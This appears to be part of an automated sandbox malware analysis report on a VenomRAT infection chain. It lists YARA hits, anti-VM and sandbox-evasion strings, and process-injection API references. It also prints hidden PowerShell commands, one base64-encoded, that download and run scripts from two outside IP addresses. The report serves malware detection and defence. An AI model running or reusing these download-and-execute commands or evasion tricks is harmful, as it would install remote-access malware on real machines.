Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Yara detected VenomRAT

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2794	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 518	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4937	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4715	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5417	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4266	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736	Thread sleep count: 4937 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104	Thread sleep count: 4715 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6572	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5388	Thread sleep count: 5417 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5796	Thread sleep count: 4266 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_6E2F6CE9 FindFirstFileExW,

5_2_6E2F6CE9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000008.00000002.2283880375.0000000007363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000003.00000002.2215011950.00000169C8100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00D3FE37

Source: C:\Windows\Temp\Package.exe

5_2_00D2B905

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_6E2F86D4 GetProcessHeap,

5_2_6E2F86D4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D3FAC0 SetUnhandledExceptionFilter,	5_2_00D3FAC0
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D3F4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00D3F4CC
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D3FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00D3FE37
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_6E2F5312 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6E2F5312
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_6E2F1386 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6E2F1386
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_6E2F1865 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6E2F1865

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.cs

Jump to dropped file

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded iwr -useb http://185.149.146.164/wrcaf.ps1 \| iex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded iwr -useb http://185.149.146.164/wrcaf.ps1 \| iex			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3C7BB SetSecurityDescriptorDacl,GetLastError,

5_2_00D3C7BB

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D3DA20 GetCurrentProcess,OpenProcessToken,malloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,free,CloseHandle,

5_2_00D3DA20

Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ProgMan
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_6E2F1A28 cpuid

5_2_6E2F1A28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
